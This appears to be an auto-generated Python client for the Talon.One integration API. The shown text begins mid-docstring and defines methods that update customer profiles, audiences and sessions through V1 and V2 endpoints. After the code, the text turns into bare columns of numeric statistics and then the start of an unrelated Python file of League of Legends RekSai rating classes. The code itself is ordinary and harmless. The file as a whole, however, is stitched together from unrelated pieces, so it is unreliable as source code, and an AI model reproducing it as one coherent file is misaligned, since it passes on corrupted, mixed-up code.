⚠️ Deprecation Notice: Support for requests to this endpoint will end on 15.07.2021. We will not remove the endpoint, and it will still be accessible for you to use. For new features support, migrate to [API V2.0](/Getting-Started/APIV2). Update (or create) a [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile). This profile information can then be matched and/or updated by campaign [Rules][]. The `integrationId` may be any identifier that will remain stable for the customer. For example, you might use a database ID, an email, or a phone number as the `integrationId`. It is vital that this ID **not** change over time, so **don't** use any identifier that the customer can update themselves. E.g. if your application allows a customer to update their e-mail address, you should instead use a database ID. Updating a customer profile will return a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. [Customer Profile]: /Getting-Started/entities#customer-profile [Rules]: /Getting-Started/entities#campaigns-rulesets-and-coupons # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile(integration_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param NewCustomerProfile body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IntegrationState
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_profile_with_http_info(integration_id, body, **kwargs) # noqa: E501
def update_customer_profile_with_http_info(self, integration_id, body, **kwargs): # noqa: E501
"""Update a Customer Profile V1 # noqa: E501
⚠️ Deprecation Notice: Support for requests to this endpoint will end on 15.07.2021. We will not remove the endpoint, and it will still be accessible for you to use. For new features support, migrate to [API V2.0](/Getting-Started/APIV2). Update (or create) a [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile). This profile information can then be matched and/or updated by campaign [Rules][]. The `integrationId` may be any identifier that will remain stable for the customer. For example, you might use a database ID, an email, or a phone number as the `integrationId`. It is vital that this ID **not** change over time, so **don't** use any identifier that the customer can update themselves. E.g. if your application allows a customer to update their e-mail address, you should instead use a database ID. Updating a customer profile will return a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. [Customer Profile]: /Getting-Started/entities#customer-profile [Rules]: /Getting-Started/entities#campaigns-rulesets-and-coupons # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile_with_http_info(integration_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param NewCustomerProfile body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'integration_id',
'body',
'dry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_profile" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'integration_id' is set
if self.api_client.client_side_validation and ('integration_id' not in local_var_params or # noqa: E501
local_var_params['integration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `integration_id` when calling `update_customer_profile`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile`") # noqa: E501
collection_formats = {}
path_params = {}
if 'integration_id' in local_var_params:
path_params['integrationId'] = local_var_params['integration_id'] # noqa: E501
query_params = []
if 'dry' in local_var_params and local_var_params['dry'] is not None: # noqa: E501
query_params.append(('dry', local_var_params['dry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/customer_profiles/{integrationId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IntegrationState', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_profile_audiences(self, body, **kwargs): # noqa: E501
"""Update a Customer Profile Audiences # noqa: E501
Update one ore multiple Customer Profiles with the specified Audiences # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile_audiences(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CustomerProfileAudienceRequest body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_profile_audiences_with_http_info(body, **kwargs) # noqa: E501
def update_customer_profile_audiences_with_http_info(self, body, **kwargs): # noqa: E501
"""Update a Customer Profile Audiences # noqa: E501
Update one ore multiple Customer Profiles with the specified Audiences # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile_audiences_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param CustomerProfileAudienceRequest body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_profile_audiences" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile_audiences`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1'] # noqa: E501
return self.api_client.call_api(
'/v2/customer_audiences', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_profile_v2(self, integration_id, body, **kwargs): # noqa: E501
"""Update a Customer Profile # noqa: E501
Update (or create) a [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile). The `integrationId` must be any identifier that remains stable for the customer. Do not use an ID that the customer can update themselves. For example, you can use a database ID. Updating a customer profile returns a response with the requested integration state. If `runRuleEngine` is set to `true`, the response includes: - The effects generated by the triggered campaigns. - The created coupons and referral objects. - Any entity that was requested in the `responseContent` request parameter. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile_v2(integration_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile. Must be unique within the account. (required)
:param CustomerProfileIntegrationRequestV2 body: (required)
:param bool run_rule_engine: Indicates whether to run the rule engine.
:param bool dry: Indicates whether to persist the changes. Changes are persisted with `true`. Only used when `runRuleEngine` is set to `true`.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IntegrationStateV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_profile_v2_with_http_info(integration_id, body, **kwargs) # noqa: E501
def update_customer_profile_v2_with_http_info(self, integration_id, body, **kwargs): # noqa: E501
"""Update a Customer Profile # noqa: E501
Update (or create) a [Customer Profile](https://developers.talon.one/Getting-Started/entities#customer-profile). The `integrationId` must be any identifier that remains stable for the customer. Do not use an ID that the customer can update themselves. For example, you can use a database ID. Updating a customer profile returns a response with the requested integration state. If `runRuleEngine` is set to `true`, the response includes: - The effects generated by the triggered campaigns. - The created coupons and referral objects. - Any entity that was requested in the `responseContent` request parameter. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profile_v2_with_http_info(integration_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile. Must be unique within the account. (required)
:param CustomerProfileIntegrationRequestV2 body: (required)
:param bool run_rule_engine: Indicates whether to run the rule engine.
:param bool dry: Indicates whether to persist the changes. Changes are persisted with `true`. Only used when `runRuleEngine` is set to `true`.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IntegrationStateV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'integration_id',
'body',
'run_rule_engine',
'dry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_profile_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'integration_id' is set
if self.api_client.client_side_validation and ('integration_id' not in local_var_params or # noqa: E501
local_var_params['integration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `integration_id` when calling `update_customer_profile_v2`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profile_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'integration_id' in local_var_params:
path_params['integrationId'] = local_var_params['integration_id'] # noqa: E501
query_params = []
if 'run_rule_engine' in local_var_params and local_var_params['run_rule_engine'] is not None: # noqa: E501
query_params.append(('runRuleEngine', local_var_params['run_rule_engine'])) # noqa: E501
if 'dry' in local_var_params and local_var_params['dry'] is not None: # noqa: E501
query_params.append(('dry', local_var_params['dry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1'] # noqa: E501
return self.api_client.call_api(
'/v2/customer_profiles/{integrationId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IntegrationStateV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_profiles_v2(self, body, **kwargs): # noqa: E501
"""Update multiple Customer Profiles # noqa: E501
Update (or create) up to 1000 [Customer Profiles](https://developers.talon.one/Getting-Started/entities#customer-profile) in 1 request. The `integrationId` must be any identifier that remains stable for the customer. Do not use an ID that the customer can update themselves. For example, you can use a database ID. A customer profile [can be linked to one or more sessions](https://developers.talon.one/Integration-API/API-Reference#updateCustomerSessionV2). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profiles_v2(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param MultipleCustomerProfileIntegrationRequest body: (required)
:param str silent: If set to `yes`, response will be an empty 204, otherwise a list of integration states will be generated (up to 1000).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: MultipleCustomerProfileIntegrationResponseV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_profiles_v2_with_http_info(body, **kwargs) # noqa: E501
def update_customer_profiles_v2_with_http_info(self, body, **kwargs): # noqa: E501
"""Update multiple Customer Profiles # noqa: E501
Update (or create) up to 1000 [Customer Profiles](https://developers.talon.one/Getting-Started/entities#customer-profile) in 1 request. The `integrationId` must be any identifier that remains stable for the customer. Do not use an ID that the customer can update themselves. For example, you can use a database ID. A customer profile [can be linked to one or more sessions](https://developers.talon.one/Integration-API/API-Reference#updateCustomerSessionV2). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_profiles_v2_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param MultipleCustomerProfileIntegrationRequest body: (required)
:param str silent: If set to `yes`, response will be an empty 204, otherwise a list of integration states will be generated (up to 1000).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(MultipleCustomerProfileIntegrationResponseV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'body',
'silent'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_profiles_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_profiles_v2`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'silent' in local_var_params and local_var_params['silent'] is not None: # noqa: E501
query_params.append(('silent', local_var_params['silent'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1'] # noqa: E501
return self.api_client.call_api(
'/v2/customer_profiles', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='MultipleCustomerProfileIntegrationResponseV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_session(self, customer_session_id, body, **kwargs): # noqa: E501
"""Update a Customer Session V1 # noqa: E501
⚠️ Deprecation Notice: Support for requests to this endpoint will end on 15.07.2021. We will not remove the endpoint, and it will still be accessible for you to use. For new features support, migrate to [API V2.0](https://developers.talon.one/Getting-Started/APIV2). Update (or create) a [Customer Session](https://developers.talon.one/Getting-Started/entities#customer-session). For example, use this endpoint to represent which items are in the customer's cart. The Talon.One platform supports multiple simultaneous sessions for the same profile. If you have multiple ways of accessing the same application you can either: - Track multiple independent sessions or, - Use the same session across all of them. You should share sessions when application access points share other state, such as the user's cart. If two points of access to the application have independent states, for example a user can have different items in their cart across the two) they should use independent customer session ID's. To link a session to a customer profile, set the `profileId` parameter in the request body to a customer profile's `integrationId`. To track an anonymous session use the empty string (`\"\"`) as the `profileId`. **Note:** You do **not** have to create a customer profile first. If the specified profile does not exist, an empty profile is created automatically. Updating a customer profile returns a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. The currency for the session and the cart items in the session is the same as that of the application with which the session is associated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_session(customer_session_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str customer_session_id: The custom identifier for this session, must be unique within the account. (required)
:param NewCustomerSession body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IntegrationState
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_session_with_http_info(customer_session_id, body, **kwargs) # noqa: E501
def update_customer_session_with_http_info(self, customer_session_id, body, **kwargs): # noqa: E501
"""Update a Customer Session V1 # noqa: E501
⚠️ Deprecation Notice: Support for requests to this endpoint will end on 15.07.2021. We will not remove the endpoint, and it will still be accessible for you to use. For new features support, migrate to [API V2.0](https://developers.talon.one/Getting-Started/APIV2). Update (or create) a [Customer Session](https://developers.talon.one/Getting-Started/entities#customer-session). For example, use this endpoint to represent which items are in the customer's cart. The Talon.One platform supports multiple simultaneous sessions for the same profile. If you have multiple ways of accessing the same application you can either: - Track multiple independent sessions or, - Use the same session across all of them. You should share sessions when application access points share other state, such as the user's cart. If two points of access to the application have independent states, for example a user can have different items in their cart across the two) they should use independent customer session ID's. To link a session to a customer profile, set the `profileId` parameter in the request body to a customer profile's `integrationId`. To track an anonymous session use the empty string (`\"\"`) as the `profileId`. **Note:** You do **not** have to create a customer profile first. If the specified profile does not exist, an empty profile is created automatically. Updating a customer profile returns a response with the full integration state. This includes the current state of the customer profile, the customer session, the event that was recorded, and an array of effects that took place. The currency for the session and the cart items in the session is the same as that of the application with which the session is associated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_session_with_http_info(customer_session_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str customer_session_id: The custom identifier for this session, must be unique within the account. (required)
:param NewCustomerSession body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'customer_session_id',
'body',
'dry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_session" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'customer_session_id' is set
if self.api_client.client_side_validation and ('customer_session_id' not in local_var_params or # noqa: E501
local_var_params['customer_session_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `customer_session_id` when calling `update_customer_session`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_session`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_session_id' in local_var_params:
path_params['customerSessionId'] = local_var_params['customer_session_id'] # noqa: E501
query_params = []
if 'dry' in local_var_params and local_var_params['dry'] is not None: # noqa: E501
query_params.append(('dry', local_var_params['dry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1', 'integration_auth'] # noqa: E501
return self.api_client.call_api(
'/v1/customer_sessions/{customerSessionId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IntegrationState', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_customer_session_v2(self, customer_session_id, body, **kwargs): # noqa: E501
"""Update a Customer Session # noqa: E501
Update (or create) a [Customer Session](https://developers.talon.one/Getting-Started/entities#customer-session). For example, use this endpoint to represent which items are in the customer's cart. The Talon.One platform supports multiple simultaneous sessions for the same profile. If you have multiple ways of accessing the same application you can either: - Track multiple independent sessions or, - Use the same session across all of them. You should share sessions when application access points share other state, such as the user's cart. If two points of access to the application have independent states, for example a user can have different items in their cart across the two) they should use independent customer session ID's. To link a session to a customer profile, set the `profileId` parameter in the request body to a customer profile's `integrationId`. To track an anonymous session use the empty string (`\"\"`) as the `profileId`. **Note:** You do **not** have to create a customer profile first. If the specified profile does not exist, an empty profile is created automatically. Updating a customer session returns a response with the requested integration state. If `runRuleEngine` is set to `true`, the response includes: - The effects generated by the triggered campaigns. - The created coupons and referral objects. - Any entity that was requested in the `responseContent` request parameter. The currency for the session and the cart items in the session is the same as that of the application with which the session is associated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_session_v2(customer_session_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str customer_session_id: The custom identifier for this session, must be unique within the account. (required)
:param IntegrationRequest body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IntegrationStateV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_customer_session_v2_with_http_info(customer_session_id, body, **kwargs) # noqa: E501
def update_customer_session_v2_with_http_info(self, customer_session_id, body, **kwargs): # noqa: E501
"""Update a Customer Session # noqa: E501
Update (or create) a [Customer Session](https://developers.talon.one/Getting-Started/entities#customer-session). For example, use this endpoint to represent which items are in the customer's cart. The Talon.One platform supports multiple simultaneous sessions for the same profile. If you have multiple ways of accessing the same application you can either: - Track multiple independent sessions or, - Use the same session across all of them. You should share sessions when application access points share other state, such as the user's cart. If two points of access to the application have independent states, for example a user can have different items in their cart across the two) they should use independent customer session ID's. To link a session to a customer profile, set the `profileId` parameter in the request body to a customer profile's `integrationId`. To track an anonymous session use the empty string (`\"\"`) as the `profileId`. **Note:** You do **not** have to create a customer profile first. If the specified profile does not exist, an empty profile is created automatically. Updating a customer session returns a response with the requested integration state. If `runRuleEngine` is set to `true`, the response includes: - The effects generated by the triggered campaigns. - The created coupons and referral objects. - Any entity that was requested in the `responseContent` request parameter. The currency for the session and the cart items in the session is the same as that of the application with which the session is associated. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_customer_session_v2_with_http_info(customer_session_id, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str customer_session_id: The custom identifier for this session, must be unique within the account. (required)
:param IntegrationRequest body: (required)
:param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IntegrationStateV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'customer_session_id',
'body',
'dry'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_customer_session_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'customer_session_id' is set
if self.api_client.client_side_validation and ('customer_session_id' not in local_var_params or # noqa: E501
local_var_params['customer_session_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `customer_session_id` when calling `update_customer_session_v2`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_customer_session_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'customer_session_id' in local_var_params:
path_params['customerSessionId'] = local_var_params['customer_session_id'] # noqa: E501
query_params = []
if 'dry' in local_var_params and local_var_params['dry'] is not None: # noqa: E501
query_params.append(('dry', local_var_params['dry'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key_v1'] # noqa: E501
return self.api_client.call_api(
'/v2/customer_sessions/{customerSessionId}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IntegrationStateV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 56.135184
| 1,764
| 0.632687
| 11,029
| 93,016
| 5.14072
| 0.037809
| 0.035134
| 0.052595
| 0.020636
| 0.968146
| 0.966365
| 0.96252
| 0.961762
| 0.951126
| 0.946734
| 0
| 0.014255
| 0.298615
| 93,016
| 1,656
| 1,765
| 56.169082
| 0.854675
| 0.536811
| 0
| 0.765664
| 0
| 0
| 0.190115
| 0.053564
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033835
| false
| 0
| 0.006266
| 0
| 0.073935
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f5fc8d5f7e3c1dff56b0bfea428d6fdd6714d632
| 6,545
|
py
|
Python
|
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_reksai/na_reksai_bot.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
class NA_RekSai_Bot_Aatrox(Ratings):
pass
class NA_RekSai_Bot_Ahri(Ratings):
pass
class NA_RekSai_Bot_Akali(Ratings):
pass
